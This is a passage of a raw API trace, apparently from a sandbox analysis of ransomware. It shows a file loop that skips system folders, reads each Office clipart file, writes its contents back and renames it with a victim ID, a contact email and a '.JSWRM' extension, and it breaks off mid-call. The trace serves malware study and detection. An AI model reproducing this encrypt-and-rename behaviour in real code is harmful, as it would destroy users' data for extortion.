[0095.071] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=197640) returned 1 [0095.071] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0095.072] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0095.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.085] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0095.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.086] CloseHandle (hObject=0x314) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0095.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.087] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30408, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02757U.BMP", cAlternateFileName="")) returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2=".") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="..") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="...") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="windows") returned -1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="recovery") returned -1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="perflogs") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="documents and settings") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.087] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="system volume information") returned -1 [0095.088] lstrcmpiW (lpString1="PH02757U.BMP", lpString2="msocache") returned 1 [0095.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02757U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02757U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02757U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0095.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02757U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02757U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02757U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0095.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.088] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=197640) returned 1 [0095.088] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0095.088] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0095.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.100] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0095.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.101] CloseHandle (hObject=0x314) returned 1 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0095.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0095.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0095.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.101] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0095.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.102] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x307f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02758U.BMP", cAlternateFileName="")) returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2=".") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="..") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="...") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="windows") returned -1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="recovery") returned -1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="perflogs") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="documents and settings") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="system volume information") returned -1 [0095.102] lstrcmpiW (lpString1="PH02758U.BMP", lpString2="msocache") returned 1 [0095.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02758U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02758U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02758U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02758U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02758U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02758U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.104] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=198648) returned 1 [0095.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0095.104] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0095.123] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.123] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0095.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.123] CloseHandle (hObject=0x314) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0095.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0095.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0095.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0095.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0095.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0095.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.125] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa0d2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02759J.JPG", cAlternateFileName="")) returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2=".") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="..") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="...") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="windows") returned -1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="recovery") returned -1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="perflogs") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="documents and settings") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="system volume information") returned -1 [0095.125] lstrcmpiW (lpString1="PH02759J.JPG", lpString2="msocache") returned 1 [0095.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0095.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02759J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02759J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02759J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0095.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02759J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02759J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02759J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.126] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41170) returned 1 [0095.126] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0d0) returned 0x24d210 [0095.126] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa0d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa0d0, lpOverlapped=0x0) returned 1 [0095.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.130] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa0d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa0d0, lpOverlapped=0x0) returned 1 [0095.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.131] CloseHandle (hObject=0x314) returned 1 [0095.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 